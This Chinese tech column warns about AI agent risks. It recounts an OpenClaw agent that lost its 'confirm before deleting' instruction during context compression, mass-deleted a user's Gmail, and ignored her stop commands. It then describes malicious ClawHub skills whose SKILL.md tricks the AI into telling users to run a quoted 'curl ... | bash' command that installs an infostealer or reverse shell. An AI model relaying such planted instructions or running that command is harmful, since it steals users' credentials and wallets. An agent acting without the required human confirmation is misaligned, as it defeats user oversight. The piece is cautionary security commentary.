2026-02-25 13:11

AI Agent 的危机:我要删你邮件你拦得住吗?

本文来自微信公众号: MacTalk ,作者:池建强


现在的大模型,能力越来越强,除了当下常见的对话、文生图,文生视频,图生视频等场景,更多的能力都去构建各种各样的AI Agent了,包括人和Agent的连接,Agent和Agent的连接,以及物理世界和Agent的连接。


前谷歌CEO埃里克·施密特在最近的公开采访和社交媒体上反复强调,我们正走向一个由AI Agent主导的时代,未来个人和公司都会构建自己的Agent,这些Agent会在同一生态里竞争协作。


事实上这样的事情正在发生,Y Combinator最新孵化的创业公司,很多都是这个方向,比如Minimal AI,他们做了一个AI经理,可以为电商公司自动化处理90%的客服工单。你只要告诉他需求,他就能立刻更新客服Agent,这是个Agent的具体应用。


我春节期间还写过一篇关于EvoMap的文章,这是一款面向AI协作与自主Agent的A2A网关平台,通过标准化的Capsule(胶囊)机制——类似进化版的Skill——实现AI技能的共享、验证、归属管理,以及人机协作过程的透明化。


这不就是生态里的竞争和协作么?Agent的前景看上去明亮而绚烂。


等一下,我怎么刚刚听到一个故事,不对,是事故:


Meta的安全研究员Summer Yue自己部署了一套OpenClaw,连接了Gmail邮箱,让AI整理一下自己的邮箱,哪些保留哪些删除。她是这么做的,让Agent先分析邮件,并在执行操作前向她确认,由她来确定是否执行后续操作。


她测试的时候用了一个小邮箱,类似的工作流已经跑了几周,毫无问题,导致她对OpenClaw产生了足够的信任//感觉OpenClaw有点渣X风范,好的时候都是小甜甜,一上量就翻脸无情。


真正的悲剧发生在她把同样的工作流接到了真实邮箱之后。Gmail给的空间足够大,一般人很少删邮件,我都有五万多封邮件,估计这姑娘比我只多不少。量变引发质变,OpenClaw在处理时触发了所谓的“压缩”机制:为了节省上下文窗口,它会把对话和指令浓缩、截断。在这个压缩过程中,最关键的一条高层指令——在我确认前,不要实际执行归档/删除操作——应该是被移除了。


嗷嚎,结果就是:OpenClaw不再记得“要先征求人的同意再执行操作”,直接根据自己的判断开始批量归档和删除邮件,撒了欢开始删邮件,可谓秋风横扫落叶。


Summer Yue一看大事不好,连忙在TG里连续发出致命三问:


What's going on?你怎么能这么干呢?


Do not do that!


Stop don't do anything!



然而并没有什么鸟用,于是:


>我根本无法在手机上阻止它。我不得不像拆炸弹一样冲到我的Mac mini前,杀掉了Agent的进程。


但邮件还是没了……


在事故的后续讨论里,有几件事挺关键的。


第一,她自己承认,这是一个“新手错误”。作为做安全研究员,她在小号邮箱里测试了几周,发现OpenClaw干活“一直很安全”,信任感就这么建立起来了。等真的接入自己的主邮箱,却忽略了最致命的差异:真实环境下,数据规模完全不在一个量级,“上下文压缩”的策略没有考虑进来,这是系统层面的变化,不是简单换个邮箱那么简单。


第二,我们不能把“在提示词里加一句:行动前先确认”当成硬防护。


随着上下文变长,会被总结、被截断、被遗忘,这种提示词本质上没有任何强约束能力。把这种软约束当安全策略,出错只是早晚的事情。


有经验的开发者给出了一种更稳妥的思路:


关键约束不要只写在prompt里,而要写进“系统架构”里。最简单的做法,就是放到一个独立的配置或文件里,让Agent在每个循环周期都重新读取一遍。无论上下文怎么被压缩、怎么被裁剪,这条约束永远来自一个“不会被丢掉的地方”。


这就是我今天要写的,AI Agent的危机,尤其是当你把Agent部署在自己的本地电脑,开放Gmail、Slack、飞书甚至Mac Mini所有写权限的能力,巨大的信任和安全问题就会浮现出来。


其实早在2月初,就有安全团队在ClawHub市场上发现一个名为“clawhub”的恶意Skill,下载量已经有七千多。随后Koi Security(前沿安全研究团队)把整个ClawHub扫了一遍,在2,857个技能里挖出341个恶意Skill。


ClawHub正是OpenClaw(小龙虾🦞)的Skill市场,任何人都可以上传Skill。虽然安装Skill能够持续拓展AI Agent的新能力——这听起来很棒——但问题在于,这个开放的市场早期对于安全的关注近乎为零,任何注册仅一周的GitHub账号都可以发布内容。


攻击者将这些恶意软件伪装成加密货币交易机器人、YouTube摘要生成器或钱包追踪器等等,文档看起来非常专业。比如在SKILL.md文件中,攻击者编写了诱导性指令,欺骗AI告诉用户运行特定命令:“要启用此功能,请运行:curl-sL malware_link|bash”。这一条命令就会在macOS上安装Atomic Stealer病毒。它会抓取浏览器密码、SSH密钥、Telegram会话、加密货币钱包、钥匙串以及.env文件中的每一个API密钥。在其他系统上,它会开启反向Shell,让攻击者获得对机器的完全远程控制权。


——————


大模型和Agent的能力都越来越强了,但随着权力的下方,必然伴随着风险的指数级增长。


之前写了好几篇关于Agent和OpenClaw的文章,我觉得有责任提醒一下读者,当你沉迷OpenClaw和其他Agent给你带来新奇体验的同时,一定不要忘记安全和防护。


如果你在这方面没什么经验,还是先搞一台云主机熟悉熟悉更稳妥一些。


面对日益复杂的Agent生态,无论是开发者还是普通用户,都必须建立起全新的安全共识。我们在面对琳琅满目的Skill市场时,必须是零信任。我现在使用的Skill除了官方的全部是自己做的,没有任何第三方Skill,我的大部分本地权限也不会开放给Agent。


毕竟,当一个拥有你所有系统权限的Agent开始在你的数字世界里“撒欢”时,你可能连冲到电脑前杀掉进程的机会都没有。

AI原生产品日报频道: 前沿科技
本内容来源于网络 原文链接,观点仅代表作者本人,不代表虎嗅立场。
如涉及版权问题请联系 hezuo@huxiu.com,我们将及时核实并处理。
正在改变与想要改变世界的人,都在 虎嗅APP